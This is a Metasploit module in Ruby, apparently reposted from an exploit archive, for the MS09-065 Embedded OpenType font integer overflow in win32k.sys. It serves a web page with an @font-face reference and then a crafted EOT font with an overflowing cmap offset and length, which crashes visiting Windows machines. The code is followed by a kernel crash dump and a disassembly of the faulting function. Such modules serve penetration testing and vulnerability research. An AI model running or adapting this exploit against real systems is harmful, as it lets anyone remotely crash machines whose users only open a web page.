Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)

##
# $Id: ms09_065_eot_integer.rb 7470 2009-11-11 23:48:53Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Windows EOT Font Table Directory Integer Overflow',
			'Description'    => %q{
				This module exploits an integer overflow flaw in the Microsoft Windows Embedded
			OpenType font parsing code located in win32k.sys. Since the kernel itself parses
			embedded web fonts, it is possible to trigger a BSoD from a normal web page when
			viewed with Internet Explorer.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'hdm',
			'Version'        => '$Revision: 7470 $',
			'References'     =>
				[
					[ 'CVE', '2009-2514' ],
					[ 'MSB', 'MS09-065' ],
					[ 'OSVDB', '59869']
				],
			'DisclosureDate' => 'Nov 10 2009'
		))
		register_options([
			OptPath.new('EOTFILE', [ true, "The EOT template to use to generate the trigger", File.join(Msf::Config.install_root, "data", "exploits", "pricedown.eot")]),
		], self.class)

	end

	def run
		exploit
	end

	def on_request_uri(cli, request)
		@tag ||= Rex::Text.rand_text_alpha(8)
		@eot ||= ::File.read(datastore['EOTFILE'], ::File.size(datastore['EOTFILE']))

		if(request.uri =~ /#{@tag}$/)
			content = @eot.dup

			# Only this table entry seems to trigger the bug
			cidx = content.index('cmap')

			# Use an offset and a length that overflow when combined
			coff = 0xb0000000
			clen = (0xfffffffe - coff + 0xcc)

			# Patch in the modified offset and length values
			content[cidx + 8, 8] = [ coff, clen ].pack("N*")

			# Send the font on its merry way
			print_status("Sending embedded font to #{cli.peerhost}:#{cli.peerport}...")
			send_response_html(cli, content, { 'Content-Type' => 'application/octet-stream' })
		else
			var_title = Rex::Text.rand_text_alpha(6 + rand(32))
			var_body = Rex::Text.rand_text_alpha(64 + rand(32))
			var_font = Rex::Text.rand_text_alpha(2 + rand(6))
			var_face = Rex::Text.rand_text_alpha(2 + rand(32))

			content = %Q|<html><head><title>#{var_title}</title><style type="text/css">
@font-face{ font-family: '#{var_face}';  src: url('#{get_resource}/#{var_font}#{@tag}'); }
body {
	font-family: '#{var_face}';
}
</style></head><body> #{var_body} </body></html>|

			print_status("Sending HTML page with embedded font to #{cli.peerhost}:#{cli.peerport}...")
			send_response_html(cli, content, { 'Content-Type' => 'text/html' })
		end
	end
end

=begin

#
# Crash dump information
#

READ_ADDRESS:  b0f70072

FAULTING_IP:
win32k!bComputeIDs+28
bf87c9df 8a6702          mov     ah,byte ptr [edi+2]

MM_INTERNAL_CODE:  0

IMAGE_NAME:  win32k.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  45f013f6

MODULE_NAME: win32k

FAULTING_MODULE: bf800000 win32k

DEFAULT_BUCKET_ID:  DRIVER_FAULT

BUGCHECK_STR:  0x50

PROCESS_NAME:  csrss.exe

TRAP_FRAME:  b22192e8 -- (.trap 0xffffffffb22192e8)
ErrCode = 00000000
eax=00000000 ebx=00000000 ecx=500000ca edx=00f70010 esi=b22198d8 edi=b0f70070
eip=bf87c9df esp=b221935c ebp=b2219374 iopl=0         nv up ei pl nz na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010206
win32k!bComputeIDs+0x28:
bf87c9df 8a6702          mov     ah,byte ptr [edi+2]        ds:0023:b0f70072=??
Resetting default scope

LAST_CONTROL_TRANSFER:  from 804f79d7 to 80526fc8

STACK_TEXT:
b2218e24 804f79d7 00000003 b0f70072 00000000 nt!RtlpBreakWithStatusInstruction
b2218e70 804f85c4 00000003 00000000 c0587b80 nt!KiBugCheckDebugBreak+0x19
b2219250 804f8aef 00000050 b0f70072 00000000 nt!KeBugCheck2+0x574
b2219270 8051c0d3 00000050 b0f70072 00000000 nt!KeBugCheckEx+0x1b
b22192d0 8053f90c 00000000 b0f70072 00000000 nt!MmAccessFault+0x8e7
b22192d0 bf87c9df 00000000 b0f70072 00000000 nt!KiTrap0E+0xcc
b2219374 bf87a391 00f70010 b22198d8 b2219a76 win32k!bComputeIDs+0x28
b22193a8 bf87a02b 00f70010 00004d18 00000000 win32k!bVerifyTTF+0xe1
b2219a68 bf879f0e e234b668 00f70010 00004d18 win32k!bLoadTTF+0x7c
b2219af0 bf879e48 e234b668 00f70010 00004d18 win32k!bLoadFontFile+0x228
b2219b40 bf879911 00000001 e234b660 b2219bf0 win32k!ttfdSemLoadFontFile+0x4c
b2219b70 bf87989f 00000001 e234b660 b2219bf0 win32k!PDEVOBJ::LoadFontFile+0x3a
b2219ba8 bf96370c 00000000 00000000 e234b660 win32k!vLoadFontFileView+0x12b
b2219c5c bf93eda9 e234b660 00000000 00000000 win32k!PUBLIC_PFTOBJ::hLoadMemFonts+0x6a
b2219cb4 bf9488e4 00f70000 e10ff0b0 00000000 win32k!GreAddFontMemResourceEx+0x76
b2219d48 8053ca28 0297cc48 00004d18 00000000 win32k!NtGdiAddFontMemResourceEx+0xb0
b2219d48 7c90eb94 0297cc48 00004d18 00000000 nt!KiFastCallEntry+0xf8
0172f6dc 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet

win32k!bComputeIDs:
bf87c9b7 8bff            mov     edi,edi
bf87c9b9 55              push    ebp
bf87c9ba 8bec            mov     ebp,esp
bf87c9bc 83ec10          sub     esp,10h
bf87c9bf 8b450c          mov     eax,dword ptr [ebp+0Ch]
bf87c9c2 8b4804          mov     ecx,dword ptr [eax+4]
bf87c9c5 53              push    ebx
bf87c9c6 57              push    edi
bf87c9c7 8b38            mov     edi,dword ptr [eax]
bf87c9c9 037d08          add     edi,dword ptr [ebp+8]
bf87c9cc 33db            xor     ebx,ebx
bf87c9ce 33c0            xor     eax,eax
bf87c9d0 83f904          cmp     ecx,4
bf87c9d3 895df8          mov     dword ptr [ebp-8],ebx
bf87c9d6 894dfc          mov     dword ptr [ebp-4],ecx
bf87c9d9 0f82cf000000    jb      win32k!bComputeIDs+0x1be (bf87caae)
bf87c9df 8a6702          mov     ah,byte ptr [edi+2]  <--- the crash above

=end